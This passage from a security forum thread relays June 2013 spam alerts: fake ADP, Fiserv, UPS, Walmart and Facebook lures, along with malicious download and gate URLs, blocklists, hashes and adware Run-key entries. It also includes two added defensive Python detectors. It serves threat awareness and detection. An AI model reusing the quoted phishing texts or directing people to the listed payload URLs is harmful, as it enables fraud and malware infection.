193.147.61.250 (Universidad Rey Juan Carlos, Spain)
193.254.231.51 (Universitatea Transilvania Brasov, Romania)
202.147.169.211 (LINKdotNET, Pakistan)
Recommended blocklist:
173.254.254.110
190.93.23.10
193.147.61.250
193.254.231.51
202.147.169.211 ..."
* http://urlquery.net/report.php?id=3236122
- http://threattrack.tumblr.com/post/53444315647/adp-easynet-spam
June 20, 2013 - "Subjects Seen:
ADP EasyNet: Bank Account Change Alert
Typical e-mail details:
Dear Valued ADP Client,
As part of ADP’s commitment to provide you with exceptional service, ADP is taking additional steps to ensure that your payroll data is secure. Therefore, we are sending you this e-mail as a security precaution to confirm that you have added or changed a bank account for the following employee(s) on your account:
[Removed]
Use this links to: Review or Revert this changes.
If you have not made and authorized this bank account change, please contact your ADP Service Team immediately.
This security precaution is another reason why so many businesses like yours choose ADP, the world’s leading payroll provider for over 60 years, to handle their payroll.
Sincerely,
Your ADP Service Team
Malicious URLs
support.mega-f .ru/easynet.html?view_id=6L9IRMQH
ssl.casalupitacafe .com/indication/occurred_sharing-blank.php
ssl.casalupitacafe .com/indication/occurred_sharing-blank.php?jnlp=4248af38de
ssl.casalupitacafe .com/indication/occurred_sharing-blank.php?otfjbgzd=mekpsr&lmbcq=snfip
ssl.casalupitacafe .com/indication/occurred_sharing-blank.php?lf=1i:1f:32:33:2v&fe=1j:1h:1j:1n:2v:33:1i:1n:31:32&j=1f&fo=a&jb=m&jopa=5634202
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/61217721bcdc3581e760462fb0175661/tumblr_inline_mop8h6Iy9H1qz4rgp.png
___
Fake QuickBooks Overdue Payment Spam
- http://threattrack.tumblr.com/post/53442271393/quickbooks-overdue-payment-spam
20 June 2013 - "Subjects Seen:
Please respond - overdue payment
Typical e-mail details:
Please find attached your invoices for the past months. Remit the payment by 06/25/2013 as outlines under our “Payment Terms” agreement.
Thank you for your business,
Sincerely,
Ginger Mccall
Malicious URLs
checkpoint-friendly-bag .com/ponyb/gate.php
checkpoint-friendly-bags .com/ponyb/gate.php
checkpoint-friendly-laptopcases .com/ponyb/gate.php
checkpoint-friendly-luggage .com/ponyb/gate.php
backup.hellaswebnews .com/8P6j4.exe
powermusicstudio .it/Ckq.exe
gpbit .com/MACnU.exe
sedi .ch/XDHMsu.exe
Malicious File Name and MD5:
<name>_Invoice.zip (eef2fd603a9412d3e5b99264d20a7155)
<name>_Invoice.exe (eb362fe45a54707d5c796e36975e88a5)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/19994123e5aa6ae0d0eaf1c64c394361/tumblr_inline_mop6ptsVz51qz4rgp.png
___
Fake WalMart Order Spam
- http://threattrack.tumblr.com/post/53398921161/walmart-com-order-spam
June 19, 2013 - "Subjects Seen:
Thanks for your Walmart.com Order [removed]
Typical e-mail details:
Thanks for ordering from Walmart.com. We’re currently processing your order.
You’ll receive another email, with tracking information, when your order ships.
If you’re paying by credit card or Bill Me Later®, your account will not be charged until your order ships.
If you see a pending charge on your account prior to your items shipping, this is an authorization hold to ensure the funds are available.
All other forms of payment are charged at the time the order is placed...
Malicious URLs
culinare .tv/wp-content/plugins/customize-admin/walmart.html
ssl.beautysupplyeast .com/indication/primary-processor_cost.php
ssl.beautysupplyeast .com/indication/primary-processor_cost.php?jnlp=4248af38de
ssl.beautysupplyeast .com/indication/primary-processor_cost.php?ef=1i:1f:32:33:2v&le=1j:1h:1j:1n:2v:33:1i:1n:31:32&j=1f&ol=r&gq=m&jopa=4794157
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/71b52756fefe4495b8a58362558efc79/tumblr_inline_moo1k2wX111qz4rgp.png
:mad:
AplusWebMaster
2013-06-21, 22:31
FYI...
Flash spoof leads to infectious audio ads
- http://blog.webroot.com/2013/06/21/adobe-flash-spoof-leads-to-infectious-audio-ads/
June 21, 2013 - "We’ve seen quite a few audio ads infecting users recently... As you can see in this first picture, this is another Adobe Flash spoof that launches its signature update window.
> https://webrootblog.files.wordpress.com/2013/06/audio-ads1.jpg?w=869
... It doesn’t matter what option you check; once you click “NEXT” you’ll get this next window.
> https://webrootblog.files.wordpress.com/2013/06/audio-ads2.jpg?w=869
So far this seems completely official and harmless. It even takes its time progressing the loading bar. However, once you click “Finish” everything closes down and the computer reboots. The command force quits all applications so you won’t have time to save anything or cancel the shutdown. Once the computer reboots there is no final closing message from “Adobe”, but everything seems normal for a few minutes. After about three to five minutes the computer slows down to a crawl and Audio ads start playing in the background... The audio streams are not being run by an audio application or an internet browser session, but instead a hijacked “svchost.exe” that’s using 88.25% CPU. If we take a look at its network communication we find that it’s establishing and closing over a hundred different connections at once. This is why the audio ads aren’t coherent and are basically just multiple advertisement streams all at once which makes for quite an annoying sound... Software Modem and Utility Suite are the culprit. If you read the full command they are located in appdata and point to two randomly named DLLs called “qogrpr.dll” and “ntrti.dll”. This is extremely suspicious. All you need to do is delete the files in appdata and then remove the run keys from startup. The full registry key and directory location are below.
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“qogrpr”=”\”C:\\Windows\\System32\\rundll32.exe\” \”C:\\Users\\”youruserfolder”\\AppData\\Roaming\\qogrpr.dll\”,GetGlobals”
“ntrti”=”\”C:\\Windows\\System32\\rundll32.exe\” \”C:\\Users\\”youruserfolder”\\AppData\\Roaming\\ntrti.dll\”,NewMember”
... That’s it for this variant of the Audio ads. There are also other variants that use rootkits to infect the MBR..."
:mad::mad:
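The Webroot write-up quoted in the post above pins the persistence on two Run values that launch rundll32.exe against DLLs dropped in AppData\Roaming. Here is an added example, not Webroot's code or tooling, that inspects a .reg export of the Run keys and flags exactly that pattern: rundll32 loading a DLL from a user-writable location. The export text is constructed here (user name alice, two benign entries added for contrast, and the two values the post quotes); find_rundll32_autoruns, Finding and the USER_WRITABLE_RE heuristic are this example's own names, not anything from the post.

```python
import re
from dataclasses import dataclass

# Constructed .reg export (not from the post): two benign entries plus the two
# rundll32 values the Webroot write-up above describes, with a made-up user name.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Sidebar"="C:\\Program Files\\Windows Sidebar\\sidebar.exe /autoRun"
"qogrpr"="\"C:\\Windows\\System32\\rundll32.exe\" \"C:\\Users\\alice\\AppData\\Roaming\\qogrpr.dll\",GetGlobals"
"ntrti"="\"C:\\Windows\\System32\\rundll32.exe\" \"C:\\Users\\alice\\AppData\\Roaming\\ntrti.dll\",NewMember"
'''

RUN_KEYS = (
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
)
# rundll32[.exe] <dll path>,<export>   (the path may be quoted)
RUNDLL32_RE = re.compile(
    r'rundll32(?:\.exe)?"?\s+"?(?P<dll>[^",]+?\.dll)"?,(?P<export>\w+)', re.IGNORECASE)
# Locations a standard user can write to; legitimate rundll32 autoruns rarely live here.
USER_WRITABLE_RE = re.compile(
    r'\\Users\\[^\\]+\\AppData\\|\\ProgramData\\|\\Temp\\', re.IGNORECASE)


@dataclass
class Finding:
    key: str
    value_name: str
    dll: str
    export: str


def _unescape(reg_string: str) -> str:
    """Undo .reg escaping (backslash-backslash and backslash-quote)."""
    return re.sub(r'\\(.)', r'\1', reg_string)


def parse_reg_export(text: str) -> dict:
    """Map each [key] in a .reg export to its "name"="value" string entries."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            keys[current] = {}
        elif current and line.startswith('"'):
            m = re.match(r'"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$', line)
            if m:
                keys[current][_unescape(m.group(1))] = _unescape(m.group(2))
    return keys


def find_rundll32_autoruns(text: str) -> list:
    """Flag Run values where rundll32 loads a DLL from a user-writable path."""
    findings = []
    for key, values in parse_reg_export(text).items():
        if key not in RUN_KEYS:
            continue
        for name, cmd in values.items():
            m = RUNDLL32_RE.search(cmd)
            if m and USER_WRITABLE_RE.search(m.group("dll")):
                findings.append(Finding(key, name, m.group("dll"), m.group("export")))
    return findings


if __name__ == "__main__":
    for f in find_rundll32_autoruns(SAMPLE_REG_EXPORT):
        print(f"{f.value_name}: rundll32 -> {f.dll},{f.export}  [{f.key}]")
```

On a live host the input would come from `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg` (and the HKLM equivalent); the OneDrive entry is deliberately left unflagged even though it lives under AppData, because the heuristic keys on rundll32 loading a DLL, not on the directory alone.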
AplusWebMaster
2013-06-22, 16:02
FYI...
Fake LexisNexis SPAM ...
- http://blog.dynamoo.com/2013/06/lexisnexis-spam-fail.html
21 Jun 2013 - "This -fake- LexisNexis spam is meant to have a malicious attachment, but something has gone wrong. Nonetheless, the next time the spammers try it they will probably get it right.. so beware of any emails similar to this one.
Date: Fri, 21 Jun 2013 10:48:12 -0700 [13:48:12 EDT]
From: LexisNexis [einvoice.notification @lexisnexis .com]Book
Subject: Invoice Notification for June 2013 ...
Screenshot: https://lh3.ggpht.com/-O31Ed0UEqAk/UcTKD_VRYEI/AAAAAAAABXM/yl8xU_aOkyQ/s1600/lexisnexis.png
// ... Of note, the only link in the email goes to [donotclick]https ://server.nepplelaw .com/owa/redir.aspx?C=430ed6e3b59a4a69b2d5653797c3e3d6&URL=http%3a%2f%2fwww.adobe .com%2fproducts%2facrobat%2freadstep2.html which is the sort of thing that happens to a URL when it goes through Outlook Web Access; in this case it would be on the server server.nepplelaw .com ..."
* https://www.virustotal.com/en/file/8733cea3145c5cfac6ab9d42b867b0a598a42e87add553d01f77efa39d1588bc/analysis/
File name: LexisNexis_Invoice_06212013.zip
Detection ratio: 15/47
Analysis date: 2013-06-21
___
"Unusual Visa card activity" SPAM / anygus .com
- http://blog.dynamoo.com/2013/06/unusual-visa-card-activity-spam.html
21 Jun 2013 - "... this FAIL of a Visa spam leads to malware on anygus .com. Note the bits in {braces} that should have content..
From: Visa Anti-Fraud [upbringingve @visabusiness .com]
Date: 21 June 2013 17:36
Subject: Unusual Visa card activity
we {l1} detected {l2} activity in your business visa account.
please click here to view {l4}
your case id is: {symbol}{dig}
look for unexpected charges or questionable activity, and if you see anything suspicious,don't wait to act.
this added security is to prevent any additional fraudulent charges from taking place on your account.
notice: this visa communication is furnished to you solely in your capacity as a customer of visa inc. (or its authorized agent) or a participant in the visa payments system. by accepting this visa communication, you acknowledge that the information contained herein (the "information") is confidential and subject to the confidentiality restrictions contained in visa's operating regulations, which limit your use of the information. you agree to keep the information confidential and not to use the information for any purpose other than in your capacity as a customer of visa inc. or a participant in the visa payments system. the information may only be disseminated within your organization on a need-to-know basis to enable your participation in the visa payments system.
please be advised that the information may constitute material nonpublic information under u.s. federal securities laws and that purchasing or selling securities of visa inc. while being aware of material nonpublic information would constitute a violation of applicable u.s. federal securities laws. this information may change from time to time. please contact your visa representative to verify current information. visa is not responsible for errors in this publication. the visa non-disclosure agreement can be obtained from your visa account manager or the nearest visa office.
this message was sent to you by visa, p.o. box 8999, san francisco, ca 94128. please click here to unsubscribe.
Despite the errors in the email it still ends up going through a -hacked- legitimate site to a Blackhole Exploit kit at [donotclick]anygus .com/news/fewer_tedious_mentioning.php (report here*) hosted on the following IPs:
193.254.231.51 (Universitatea Transilvania Brasov, Romania)
202.147.169.211 (LINKdotNET Telecom, Pakistan)
Recommended blocklist:
193.254.231.51
202.147.169.211 ..."
* http://urlquery.net/report.php?id=3262435
"... Detected BlackHole v2.0 exploit kit URL pattern ..."
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Product Purchase Email Messages - 2013 Jun 21
Fake Claims Invoice Email Messages - 2013 Jun 21
Fake Bill Payment Notification Email Messages - 2013 Jun 21
Fake Christmas Greeting Email Messages - 2013 Jun 21
Fake Bill Payment Request Email Messages - 2013 Jun 21
Fake Payment Notification Email Messages - 2013 Jun 21
Fake Portuguese Bank Deposit Delivery Notification Email Messages - 2013 Jun 21
Malicious Attachment Email Messages - 2013 Jun 21
Fake Xerox Scan Attachment Email Messages - 2013 Jun 21
Fake German Invoice Delivery Email Messages - 2013 Jun 21
(More detail and links at the cisco URL above.)
AplusWebMaster
2013-06-24, 19:10
FYI...
Fake Facebook SPAM / chinadollars .net
- http://blog.dynamoo.com/2013/06/facebook-spam-chinadollarsnet.html
24 June 2013 - "This fake Facebook spam leads to malware on chinadollars .net:
Date: Mon, 24 Jun 2013 09:18:12 -0500
From: Facebook [notification+SCCRJ42M8P @facebookmail .com]
Subject: You have 1 friend request ...
You have new notifications.
A lot has happened on Facebook since you last logged in. Here are some notifications you've missed from your friends.
1 friend request
View Notifications
Go to Facebook
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please unsubscribe.
Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA 94303
The link in the email goes through a legitimate but -hacked- site and then leads to a malware landing page at [donotclick]chinadollars .net/news/inputted-ties.php (report here*) hosted on:
119.147.137.31 (China Telecom, China)
202.147.169.211 (LINKdotNET, Pakistan)
203.80.17.155 (MYREN Cloud Infrastructure, Malaysia)
210.42.103.141 (Wuhan Urban Construction Institute, China)
Recommended blocklist:
119.147.137.31
202.147.169.211
203.80.17.155
210.42.103.141 ..."
* http://urlquery.net/report.php?id=3303350
___
Fake Fiserv SPAM - / SecureMessage_TBTATU41DMJDT5B.zip
- http://blog.dynamoo.com/2013/06/fiserv-secure-email-notification.html
24 June 2013 - "This fake FISERV email has a malicious attachment SecureMessage_TBTATU41DMJDT5B.zip containing a trojan named SecureMessage.exe:
Date: Mon, 24 Jun 2013 07:27:59 -0600 [09:27:59 EDT]
From: Fiserv Secure Notification [secure.notification @fiserv .com]
Subject: Fiserv Secure Email Notification - TBTATU41DMJDT5B
Part(s):
2 SecureMessage_TBTATU41DMJDT5B.zip [application/zip] 104 KB
You have received a secure message
Read your secure message by opening the attachment, SecureMessage_TBTATU41DMJDT5B.zip.
The attached file contains the encrypted message that you have received.
To decrypt the message use the following password - SUgDu07dn
To read the encrypted message, complete the following steps:
- Double-click the encrypted message file attachment to download the file to your computer.
- Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
- The message is password-protected, enter your password to open it.
To access from a mobile device, forward this message to mobile @res .fiserv .com to receive a mobile login URL.
If you have concerns about the validity of this message, please contact the sender directly. For questions about secure e-mail encryption service, please contact technical support at 888.710.6198.
2000-2013 Fiserv Secure Systems, Inc. All rights reserved.
Ask yourself this question: why would you encrypt a message and then put the password in the email? Simple.. to get past virus scanners, of course! The VirusTotal detection for this malware is just 8/46*.
Other analysis is pending, the malware has the following checksums:
Size 117248
MD5 fdd154360854e2d9fee47a557b296519
SHA1 d3de7f5514944807eadb641353ac9380f0c64607
SHA256 1ef3302196f5c4cd9bf97c719e934d612a244a17a20f5a742c15d8203d477f59
* https://www.virustotal.com/en/file/1ef3302196f5c4cd9bf97c719e934d612a244a17a20f5a742c15d8203d477f59/analysis/1372086208/
File name: SecureMessage.exe
Detection ratio: 8/46
Analysis date: 2013-06-24
- http://threattrack.tumblr.com/post/53757242508/fiserv-securemessage-attachment-spam
24 June 2013 - "Subjects Seen:
Please respond - overdue payment
Typical e-mail details:
You have received a secure message ...
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/201bb68bb4cc6d3d10a9fae75dc69b39/tumblr_inline_mowhsjzZ5Q1qz4rgp.png
___
PayPal Credentials Phish
- http://threattrack.tumblr.com/post/53756074278/paypal-credentials-phish
24 June 2013 - "Subjects Seen:
Important Message
Typical e-mail details:
Dear PayPal Manager Customer,
We regret to inform you that your merchant account has been locked.
Te re-activate it please download the file attached to this e-mail and update your login information.
Malicious URLs
bellt .es/CSS/confirm.php
Malicious File Name and MD5:
vtextloginpage.html (06c12f594dc7a558510cb9d9c402ed8f)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/e01a5689879039aff7cde4b5370185df/tumblr_inline_mowgmc7E4u1qz4rgp.png
___
Rogue ‘Free Mozilla Firefox Download’ ads lead to ‘InstallCore’ PUA...
- http://blog.webroot.com/2013/06/24/rogue-free-mozilla-firefox-download-ads-lead-to-installcore-potentially-unwanted-application-pua/
June 24, 2013 - "Our sensors continue detecting rogue ads that expose users to bogus propositions in an attempt to install privacy-invading Potentially Unwanted Applications (PUAs) on their PCs. The most recent campaign consists of a successful brand-jacking abuse of Mozilla’s Firefox browser, supposedly offered for free, while in reality, the rogue download manager entices users into installing multiple rogue toolbars, most commonly known as InstallCore...
Sample screenshot of the landing page:
> https://webrootblog.files.wordpress.com/2013/06/rogue_bogus_fake_ads_free_download_mozilla_firefox_installcore_pua_potentially_unwanted_application_ezdownload.png?w=609&h=567
Rogue download URL:
hxxp ://www.ez-download .com/mozilla-firefox
Detection rate for the Potentially Unwanted Application (PUA) – MD5: * ... Win32/InstallCore.BL; InstallCore (fs).
The rogue sample is digitally signed by ‘Secure Installer’.
Once executed, it phones back to:
media.ez-download .com – 54.230.12.193
os.downloadster2cdn .com – 54.245.235.34
cdn.secureinstaller .com – 54.230.12.162
img.downloadster2cdn .com – 199.58.87.151 ...
We advise users to avoid interacting with ads enticing them into downloading well known software applications, and to always visit their official Web sites in order to obtain the latest versions..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/eb06f4146a8e798d979aa8f6a11bd850705d31c52d7cb04a0229579c586034b9/analysis/
File name: Firefox_Setup_21.0.exe
Detection ratio: 4/47
Analysis date: 2013-06-21
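The Fiserv lure above rests on one trick: the ZIP is password-protected so the gateway cannot look inside it, and the password is handed to the victim in the same message. That combination (an encrypted archive, a password in the body, a Windows executable at the top level of the archive) can be checked from the ZIP headers alone, without ever decrypting anything. The script below is an added example, not dynamoo's or Fiserv's code; it reads the general-purpose flag bit of each archive member, pulls a "password - xxxx" string out of the body, and builds its own sample message modelled on the Fiserv text. Because Python's zipfile cannot write ZipCrypto archives, the constructed sample is written unencrypted and its encryption flag bit is then set by hand so the header check sees what a real protected archive would show; the "executable" inside is a placeholder, not a PE file.

```python
"""Flag e-mails carrying a password-protected ZIP whose password is in the
message body and whose archive lists a Windows executable.  Added example,
not dynamoo's or Fiserv's code; the sample message below is constructed."""
import io
import re
import struct
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage

EXEC_EXTENSIONS = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs")
# matches "the following password - SUgDu07dn", "password: x", "password is x"
PASSWORD_RE = re.compile(r"password\s*(?:is|-|:|=)\s*([^\s,.]+)", re.IGNORECASE)


def scan_zip(data: bytes) -> dict:
    """Read ZIP headers only: never extract, never try to decrypt."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return {"valid": False, "encrypted": False, "executables": []}
    infos = zf.infolist()
    return {
        "valid": True,
        # general-purpose flag bit 0 marks a member as encrypted (ZipCrypto or AES)
        "encrypted": any(info.flag_bits & 0x1 for info in infos),
        "executables": [i.filename for i in infos
                        if i.filename.lower().endswith(EXEC_EXTENSIONS)],
    }


def scan_email(raw: bytes) -> dict:
    """Combine the three signals: password in body, encrypted ZIP, executable inside."""
    msg = message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content() if body is not None else ""
    m = PASSWORD_RE.search(text)
    leaked = m.group(1) if m else None
    attachments = []
    for part in msg.iter_attachments():
        if part.get_content_type() != "application/zip":
            continue
        result = scan_zip(part.get_payload(decode=True))
        result["filename"] = part.get_filename()
        attachments.append(result)
    suspicious = leaked is not None and any(
        a["valid"] and a["encrypted"] and a["executables"] for a in attachments)
    return {"leaked_password": leaked, "attachments": attachments,
            "suspicious": suspicious}


def build_sample_email() -> bytes:
    """Constructed message modelled on the Fiserv lure.  zipfile cannot write
    ZipCrypto, so the archive is written in clear and the encryption flag bit is
    set afterwards in both the local and central headers; the member is a stub."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("SecureMessage.exe", b"MZ" + b"\x00" * 64)  # placeholder, not a PE
    data = bytearray(buf.getvalue())
    local = data.index(b"PK\x03\x04")     # local file header: flags at offset 6
    central = data.index(b"PK\x01\x02")   # central directory entry: flags at offset 8
    for off in (local + 6, central + 8):
        struct.pack_into("<H", data, off, struct.unpack_from("<H", data, off)[0] | 0x1)
    msg = EmailMessage()
    msg["From"] = "Fiserv Secure Notification <secure.notification@example.invalid>"
    msg["Subject"] = "Fiserv Secure Email Notification - TBTATU41DMJDT5B"
    msg.set_content("You have received a secure message.\n"
                    "To decrypt the message use the following password - SUgDu07dn\n")
    msg.add_attachment(bytes(data), maintype="application", subtype="zip",
                       filename="SecureMessage_TBTATU41DMJDT5B.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    print(scan_email(build_sample_email()))
```

Run it as a script to see the verdict for the constructed sample, or feed scan_email a raw .eml from the gateway. The point of requiring all three signals together is that encrypted archives with the password in the body do turn up in legitimate traffic, but rarely with an .exe sitting at the top level.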
AplusWebMaster
2013-06-25, 22:01
FYI...
Fake Southwest Airlines SPAM / meynerlandislaw .net
- http://blog.dynamoo.com/2013/06/southwest-airlines-confirmation-kqr101.html
25 June 2013 - "This fake Southwest Airlines spam leads to malware on meynerlandislaw .net:
from: Southwest Airlines [information @luv.southwest .com]
reply-to: Southwest Airlines [no-reply@ emalsrv.southwestmail .com]
date: 25 June 2013 17:09
subject: Southwest Airlines Confirmation: KQR101
[redacted] 2013-06-25 JACEE3 INITIAL SLC WN PHX0.00T/TFF 0.00 END AY2.50$SLC1.50 1583018870396 2013-12-22 1394 2013-06-26 Depart SALT LAKE CITY IL (SLC) at 10:14 PM on Southwest Airlines Arrive in PAOLO ALTO MI (PHX) at 1:30 PM
You're all set for your travel!
Southwest Airlines
My Account | Review My Itinerary Online ...
The link goes through a legitimate -hacked- site and ends up on a malicious payload at [donotclick]meynerlandislaw .net/news/possibility-redundant.php (report here*) hosted on the following IPs:
119.147.137.31 (China Telecom, China)
203.80.17.155 (MYREN, Malaysia)
Recommended blocklist:
119.147.137.31
203.80.17.155 ..."
* http://urlquery.net/report.php?id=3323617
"... Detected BlackHole v2.0 exploit kit URL pattern ..."
___
Something evil on 173.246.104.154
- http://blog.dynamoo.com/2013/06/something-evil-on-173246104154.html
24 June 2013 - "173.246.104.154 (Gandi, US) is hosting hacked GoDaddy domains serving a variety of malware [1] [2]..."
1] http://urlquery.net/search.php?q=173.246.104.154&type=string&start=2013-06-09&end=2013-06-24&max=50
2] https://www.virustotal.com/en/ip-address/173.246.104.154/information/
Diagnostic page for AS29169 (GANDI)
- https://www.google.com/safebrowsing/diagnostic?site=AS:29169
"... over the past 90 days, 318 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-06-25, and the last time suspicious content was found was on 2013-06-25... Over the past 90 days, we found 24 site(s) on this network... that appeared to function as intermediaries for the infection of 103 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 153 site(s)... that infected 843 other site(s)..."
___
FedEx Delivery Notification Spam
- http://threattrack.tumblr.com/post/53862085299/fedex-delivery-notification-spam
June 25, 2013 - "Subjects Seen:
Delivery Notification
Delivery Notification ID#<random>
Typical e-mail details:
Dear Client,
Your parcel has arrived at June 13. Courier was unable to deliver the parcel to you.
To receive your parcel, print this label and go to the nearest office.
Malicious URLs
txwebsolutions .com/main.php?d_info=899_549892719
ehagency .com/main.php?g_info=ss00_323
eup-ecodesign .com/main.php?g_info=ss00_323
roccoracingmotors .com/main.php?g_info=ss00_323
bebmorena .com/main.php?g_info=ss00_323
metrocomoptimist .org/img/info.php?g_info=ss00_323
Malicious File Name and MD5:
Shipment_Label.zip (a95ef37d4d992ac63cbb81e116Ca6d07)
Shipment_Label.exe (fcd9314b644d86eee71cd67c44935fc8)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/89cec4c8475090ef7c9f7c1d6208cdd2/tumblr_inline_moyqvtdowG1qz4rgp.png
___
Fake ADP SPAM / spanishafair .com
- http://blog.dynamoo.com/2013/06/adp-spam-spanishafaircom.html
25 June 2013 - "This fake ADP spam leads to malware on spanishafair .com:
Date: Tue, 25 Jun 2013 14:38:05 +0000 [10:38:05 EDT]
From: Run Do Not Reply [RunDoNotReply @ipn.adp .net]
Subject: Your Biweekly payroll is accepted
Yoyr payroll for check date 06/25/2013 is approved. Your payroll would be done at least 3 days before to your check date to ensure timely tax deposits and payroll delivery. If you offer direct deposit to your employees, this will also support pay down their money by the due date.
Client ID: [redacted]
View Details: Review
Important: Please be advised that calls to and from your payroll service team may be monitored or recorded.
Please do not reply to this message. auto informer system not configured to accept incoming messages.
The malicious payload is at [donotclick]spanishafair .com/news/possibility-redundant.php hosted on:
119.147.137.31 (China Telecom, China)
210.42.103.141 (Wuhan Urban Construction Institute, China)
203.80.17.155 (MYREN Cloud Infrastructure, Malaysia)
Related evil domains and IP addresses to block can be found here* and here**."
* http://blog.dynamoo.com/2013/06/facebook-spam-chinadollarsnet.html
** http://blog.dynamoo.com/2013/06/southwest-airlines-confirmation-kqr101.html
___
Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Bill Payment Notification Email Messages - 2013 Jun 25
Malicious Personal Pictures Attachment Email Messages - 2013 Jun 25
Fake Bank Deposit Confirmation Email Messages - 2013 Jun 25
Fake Legal Contract Form Email Messages - 2013 Jun 25
Fake Customer Complaint Attachment Email Messages - 2013 Jun 25
Fake Mobile Phone Credit Notification Email Messages - 2013 Jun 25
Fake Unpaid Debt Invoice Email Messages - 2013 Jun 25
Email Messages with Malicious Attachments - 2013 Jun 25
Fake Sample Product Purchase Order Email Messages - 2013 Jun 25
Fake Bank Payment Transfer Notification Email Messages - 2013 Jun 25
Fake Personal Photo Sharing Email Messages - 2013 Jun 25
Fake Product Order Inquiry Email Messages - 2013 Jun 25
Fake Authorization Letter Email Messages - 2013 Jun 25
(More detail and links at the cisco URL above.)
AplusWebMaster
2013-06-26, 18:54
FYI...
Fake UPS Parcel Pickup Spam
- http://threattrack.tumblr.com/post/53933973553/ups-parcel-pickup-spam
June 26, 2013 - "Subjects Seen:
UPS - Your package is available for pickup ( Parcel <random> )
Typical e-mail details:
The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.
You may pickup the parcel at our post office.
Please attention!
For mode details and shipping label please see the attached file.
Print this label to get this package at our post office.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you,
UPS Logistics Services.
Malicious URLs
nichebiznetwork .com/ponyb/gate.php
watertreecapital .com/ponyb/gate.php
attentivetodetails .com/ponyb/gate.php
furnishedfloorplans .com/ponyb/gate.php
casailtiglio .com/NY19N.exe
casevacanzeversilia .com/9jW.exe
72.52.164.246 /FDKwgvdt.exe
scenografiesacs .com/mvNaxR.exe
Malicious File Name and MD5:
Label_<random>.zip (d17aab950060319ea41b038638375268)
Label_<random>.exe (347cbf0c41a978e601b00d39928506aa)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/95660a8b8332d1fc9aa731df40ef7fd3/tumblr_inline_mp0b2emZ7e1qz4rgp.png
___
Xerox WorkCentre Scan Spam
- http://threattrack.tumblr.com/post/53943191167/xerox-workcentre-scan-spam
June 26, 2013 - "Subjects Seen:
Scanned Image from a Xerox WorkCentre
Typical e-mail details:
Tlease open the attached document. It was scanned and sent to you using a Xerox WorkCentre Pro.
Sent by: [removed]
Number of Images: 5
Attachment File Type: ZIP [PDF]
WorkCentre Pro Location: Machine location not set
Device Name: [removed]
Attached file is scanned image in PDF format.
Malicious URLs
attentivetodetails .com/ponyb/gate.php
watertreecapital .com/ponyb/gate.php
helisovertidewater .com/ponyb/gate.php
mcqbuildersllc-1 .com/ponyb/gate.php
casailtiglio .com/NY19N.exe
ftp(DOT)vickibettger .com/oEoASW64.exe
72.52.164.246 /FDKwgvdt.exe
scenografiesacs .com/mvNaxR.exe
Malicious File Name and MD5:
Scan_<random>.zip (d8d8bf4a0890c937d501b78cdfd7de13)
Scan_<random>.exe (40378c0d43dd8c135f90a704911024bd)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/0a63c5f2e3e8fe5357c7f93c60ffa848/tumblr_inline_mp0hcwPh591qz4rgp.png
AplusWebMaster
2013-06-27, 18:57
FYI...
BBB Compliant Spam
- http://threattrack.tumblr.com/post/54017972956/better-business-bureau-compliant-spam
June 27, 2013 - "Subjects Seen:
FW: Complaint Case <removed>
Typical e-mail details:
The Better Business Bureau has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer’s concern are included on the reverse. Please review this matter and advise us of your position.
As a neutral third party, the Better Business Bureau can help to resolve the matter. Often complaints are a result of misunderstandings a company wants to know about and correct.
In the interest of time and good customer relations, please provide the BBB with written verification of your position in this matter by June 30, 2013. Your prompt response will allow BBB to be of service to you and your customer in reaching a mutually agreeable resolution. Please inform us if you have contacted your customer directly and already resolved this matter.
The Better Business Bureau develops and maintains Reliability Reports on companies across the United States and Canada . This information is available to the public and is frequently used by potential customers. Your cooperation in responding to this complaint becomes a permanent part of your file with the Better Business Bureau. Failure to promptly give attention to this matter may be reflected in the report we give to consumers about your company.
We encourage you to print this complaint (attached file), answer the questions and respond to us.
We look forward to your prompt attention to this matter.
Sincerely,
BBB Serving Metropolitan New York, Long Island and the Mid-Hudson Region
Malicious URLs
ammscanada .com/ponyb/gate.php
ammschicago .com/ponyb/gate.php
